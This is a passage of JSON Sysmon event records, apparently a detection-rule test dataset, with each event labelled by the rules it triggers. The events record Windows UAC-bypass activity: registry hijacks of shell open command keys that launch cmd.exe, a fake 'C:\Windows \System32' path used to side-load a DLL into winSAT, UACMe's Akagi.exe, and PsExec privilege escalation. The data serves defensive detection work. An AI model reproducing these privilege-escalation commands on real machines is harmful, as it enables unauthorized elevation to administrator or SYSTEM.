10:16:49.960"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5950,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-04T10:16:50.009124Z"}},"Version":5}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\Windows\\system32\\cmd.exe /c start C:\\Windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-B097-5D46-0000-0010E1321204","ProcessId":1960,"RuleName":"PrivEsc - UAC bypass UACME-56","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\(Default)","UtcTime":"2019-08-04 10:16:55.415"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5953,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-04T10:16:55.441262Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-B097-5D46-0000-0010E7381204","ProcessId":3444,"RuleName":"PrivEsc - UAC bypass UACME-56","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\DelegateExecute","UtcTime":"2019-08-04 10:16:55.619"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5955,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-04T10:16:55.643799Z"}},"Version":2}}}},{"detection":["TrustedPath UAC Bypass Pattern"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows \\System32\\winSAT.exe\" formal","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\","Description":"Windows System Assessment Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991","Image":"C:\\Windows \\System32\\winSAT.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-D21D-5D3C-0000-0020DD5C2300","LogonId":"0x235cdd","ParentCommandLine":"\"C:\\Users\\IEUser\\Downloads\\UACBypass.exe\" ","ParentImage":"C:\\Users\\IEUser\\Downloads\\UACBypass.exe","ParentProcessGuid":"747F3D96-D39D-5D3C-0000-001026F55500","ParentProcessId":6632,"ProcessGuid":"747F3D96-D39D-5D3C-0000-0010131E5600","ProcessId":7128,"Product":"Microsoft® Windows® Operating System","RuleName":"PrivEsc - UACBypass Mocking Trusted WinFolders","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-27 22:43:41.972"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4727,"Execution":{"#attributes":{"ProcessID":2748,"ThreadID":3376}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-27T22:43:42.033042Z"}},"Version":5}}}},{"detection":["TrustedPath UAC Bypass Pattern"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows \\System32\\winSAT.exe\" formal","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows System Assessment Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991","Image":"C:\\Windows \\System32\\winSAT.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D21D-5D3C-0000-0020EE5B2300","LogonId":"0x235bee","ParentCommandLine":"\"C:\\Users\\IEUser\\Downloads\\UACBypass.exe\" ","ParentImage":"C:\\Users\\IEUser\\Downloads\\UACBypass.exe","ParentProcessGuid":"747F3D96-D39D-5D3C-0000-001026F55500","ParentProcessId":6632,"ProcessGuid":"747F3D96-D39E-5D3C-0000-0010805A5600","ProcessId":3904,"Product":"Microsoft® Windows® Operating System","RuleName":"PrivEsc - UACBypass Mocking Trusted WinFolders","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-27 22:43:42.354"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4730,"Execution":{"#attributes":{"ProcessID":2748,"ThreadID":3376}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-27T22:43:42.392880Z"}},"Version":5}}}},{"detection":["TrustedPath UAC Bypass Pattern"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=7CE46211A5A8D7FE4A767E12BD80769673FDAEE5,MD5=7F8A2B842948EB70133FA34F0CFE772B,SHA256=078CA38607F24FD21A563FA5189843734677B98D5017D5EBB03B2960053B25B5,IMPHASH=14E2B78EE82AD03FAC47525FEDDCA7E6","Image":"C:\\Windows \\System32\\winSAT.exe","ImageLoaded":"C:\\Windows \\System32\\WINMM.dll","ProcessGuid":"747F3D96-D39E-5D3C-0000-0010805A5600","ProcessId":3904,"Product":"?","RuleName":"PrivEsc - UACBypass Mocking Trusted WinFolders","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2019-07-27 22:43:42.661"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":4732,"Execution":{"#attributes":{"ProcessID":2748,"ThreadID":3384}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-27T22:43:43.016956Z"}},"Version":3}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"c:\\Windows\\System32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-095D-5EB4-0000-001082FF1700","ProcessId":7084,"RuleName":"PrivEsc - T1088 - UACBypass - changepk UACME61","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\Launcher.SystemSettings\\shell\\open\\command\\(Default)","UtcTime":"2020-05-07 13:13:01.680"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":112814,"Execution":{"#attributes":{"ProcessID":2888,"ThreadID":3384}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-05-07T13:13:01.683498Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-11 09:50:08.491","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-9AD0-5CD6-0000-001077FC1600","ProcessId":1136,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\CRYPTBASE.dll","UtcTime":"2019-05-11 09:50:08.491"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15875,"Execution":{"#attributes":{"ProcessID":2000,"ThreadID":1748}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-11T09:50:08.491568Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-11 09:50:13.464","Image":"C:\\Windows\\System32\\makecab.exe","ProcessGuid":"365ABB72-9AD5-5CD6-0000-0010C4131700","ProcessId":3716,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\suspicious.cab","UtcTime":"2019-05-11 09:50:13.464"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15877,"Execution":{"#attributes":{"ProcessID":2000,"ThreadID":1748}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-11T09:50:13.509892Z"}},"Version":2}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-BDD1-5EC9-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"c:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-CA4E-5EC9-0000-00109FE23700","ParentProcessId":1516,"ProcessGuid":"747F3D96-CA52-5EC9-0000-001027FA3700","ProcessId":4456,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-05-24 01:13:54.117"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":196375,"Execution":{"#attributes":{"ProcessID":2812,"ThreadID":3656}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-05-24T01:13:54.120170Z"}},"Version":5}}}},{"detection":["Taskmgr as Parent"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\","Description":"Windows Command Processor","FileVersion":"10.0.18362.449 (WinBuild.160101.0800)","Hashes":"SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8C36-5F75-0000-002034E39103","LogonId":"0x391e334","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\windows\\system32\\taskmgr.exe","ParentImage":"C:\\Windows\\System32\\Taskmgr.exe","ParentProcessGuid":"00247C92-858E-5F7B-0000-00105241202B","ParentProcessId":18404,"ProcessGuid":"00247C92-858E-5F7B-0000-0010E741202B","ProcessId":6636,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":2,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-10-05 20:43:58.450"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2164892,"Execution":{"#attributes":{"ProcessID":5424,"ThreadID":6708}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-05T20:43:58.451314Z"}},"Version":5}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"POC.exe","Company":"","CurrentDirectory":"C:\\Users\\Public\\POC\\bin\\Debug\\","Description":"SearchIndexer","FileVersion":"1.0.0.0","Hashes":"SHA1=3DA62D5328C591481C9C262BC3A77E5FF32EDBB6,MD5=15661E68D8031891DF6E0E70B547AEBB,SHA256=BEF67963D92D027E39CC5FC927805A4EBFE58C2121BA9396356EF0CE257D0C92,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Users\\Public\\POC\\bin\\Debug\\POC.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-18F5-5F76-0000-002073A80500","LogonId":"0x5a873","OriginalFileName":"POC.exe","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-1EB6-5F76-0000-00101DF51D00","ParentProcessId":8072,"ProcessGuid":"747F3D96-2156-5F76-0000-0010DBE82500","ProcessId":4696,"Product":"SearchIndexer","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-01 18:35:02.413"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":410485,"Execution":{"#attributes":{"ProcessID":3308,"ThreadID":4656}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-01T18:35:02.415351Z"}},"Version":5}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"Program","Company":"","CurrentDirectory":"C:\\Users\\Public\\POC\\bin\\Debug\\","Description":"SearchIndexer","FileVersion":"1.0.0.0","Hashes":"SHA1=3DA62D5328C591481C9C262BC3A77E5FF32EDBB6,MD5=15661E68D8031891DF6E0E70B547AEBB,SHA256=BEF67963D92D027E39CC5FC927805A4EBFE58C2121BA9396356EF0CE257D0C92,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Users\\Public\\POC\\bin\\Debug\\POC.exe","IntegrityLevel":"AppContainer","LogonGuid":"747F3D96-18F5-5F76-0000-002073A80500","LogonId":"0x5a873","OriginalFileName":"POC.exe","ParentCommandLine":"POC.exe","ParentImage":"C:\\Users\\Public\\POC\\bin\\Debug\\POC.exe","ParentProcessGuid":"747F3D96-2156-5F76-0000-0010DBE82500","ParentProcessId":4696,"ProcessGuid":"747F3D96-2156-5F76-0000-00100EEC2500","ProcessId":5448,"Product":"SearchIndexer","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-01 18:35:02.605"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":410486,"Execution":{"#attributes":{"ProcessID":3308,"ThreadID":4656}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-01T18:35:02.606952Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-10-01 18:35:02.768","Image":"C:\\Windows\\System32\\RuntimeBroker.exe","ProcessGuid":"747F3D96-1903-5F76-0000-0010B85E0900","ProcessId":6932,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\abc.txt","UtcTime":"2020-10-01 18:35:02.768"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":410487,"Execution":{"#attributes":{"ProcessID":3308,"ThreadID":4656}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-01T18:35:02.775302Z"}},"Version":2}}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-5461-5EBA-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":580,"ProcessGuid":"747F3D96-DE32-5EB9-0000-00103FC14300","ProcessId":5252,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-05-11 23:22:26.451"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":142033,"Execution":{"#attributes":{"ProcessID":2896,"ThreadID":3548}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-05-11T23:22:26.650196Z"}},"Version":5}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Users\\Public\\psexecprivesc.exe\" C:\\Windows\\System32\\mspaint.exe","Company":"?","CurrentDirectory":"C:\\Users\\Public\\","Description":"?","FileVersion":"?","Hashes":"SHA1=D7BADB1E51B7F5AB36D218854698215436C77D69,MD5=45C9D210322AC8F8AEC6D2AB003F82A9,SHA256=F60E25BFB2BF7CB3E3CBD47F6A6D12941BD0BC0CF5B5626415607FDF0ACD2132,IMPHASH=6BC87C5562804B37769BD928D309AFDA","Image":"C:\\Users\\Public\\psexecprivesc.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-FBCC-5FD0-0000-0020CB857400","LogonId":"0x7485cb","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-FBFF-5FD0-0000-0010BEC87C00","ParentProcessId":14512,"ProcessGuid":"747F3D96-00D2-5FD1-0000-0010FA4C5301","ProcessId":13004,"Product":"?","RuleName":"","TerminalSessionId":3,"User":"MSEDGEWIN10\\user02","UtcTime":"2020-12-09 16:52:34.559"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":549480,"Execution":{"#attributes":{"ProcessID":3572,"ThreadID":5040}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-12-09T16:52:34.562791Z"}},"Version":5}}}},{"detection":["PsExec Service Start"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\PSEXESVC.exe","Company":"Sysinternals","CurrentDirectory":"C:\\Windows\\system32\\","Description":"PsExec Service","FileVersion":"2.2","Hashes":"SHA1=A17C21B909C56D93D978014E63FB06926EAEA8E7,MD5=75B55BB34DAC9D02740B9AD6B6820360,SHA256=141B2190F51397DBD0DFDE0E3904B264C91B6F81FEBC823FF0C33DA980B69944,IMPHASH=67012475995FB9027F4511245B57DDEA","Image":"C:\\Windows\\PSEXESVC.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-76FA-5FD1-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"psexesvc.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":632,"ProcessGuid":"747F3D96-00D9-5FD1-0000-001021855301","ProcessId":16344,"Product":"Sysinternals PsExec","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-12-09 16:52:41.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":549482,"Execution":{"#attributes":{"ProcessID":3572,"ThreadID":5040}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-12-09T16:52:41.861437Z"}},"Version":5}}}},{"detection":["UAC Bypass Tool UACMe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"Akagi.exe 58 c:\\Windows\\System32\\cmd.exe","Company":"Hazardous Environments","CurrentDirectory":"C:\\Users\\IEUser\\Tools\\PrivEsc\\","Description":"UACMe main module","FileVersion":"3.2.5.2005","Hashes":"SHA1=874C9878FF9C1A9AC60658E83649370EA4E61829,MD5=FD17237A6B50C51CBEB45A28E0284063,SHA256=B4E9DCFC87014B2B70CC9E3CD4E34AE4425E40C81A2ED008C7D335E3F96ADD19,IMPHASH=FF31A97D8C8EBEBDA4D7B3DF95E756F1","Image":"C:\\Users\\IEUser\\Tools\\PrivEsc\\Akagi.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-B086-5EBA-0000-0020EF9E0800","LogonId":"0x89eef","OriginalFileName":"Akagi.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-B093-5EBA-0000-0010E7350E00","ParentProcessId":6708,"ProcessGuid":"747F3D96-BB89-5EBA-0000-001057413600","ProcessId":1036,"Product":"UACMe","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-05-12 15:06:49.006"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":143173,"Execution":{"#attributes":{"ProcessID":2856,"ThreadID":3608}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-05-12T15:06:49.019031Z"}},"Version":5}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\DNeruK","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-BB89-5EBA-0000-001057413600","ProcessId":1036,"RuleName":"PrivEsc - Rogue Windir - UAC bypass prep","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Environment\\windir","UtcTime":"2020-05-12 15:06:49.118"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":143174,"Execution":{"#attributes":{"ProcessID":2856,"ThreadID":3608}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-05-12T15:06:49.183867Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code 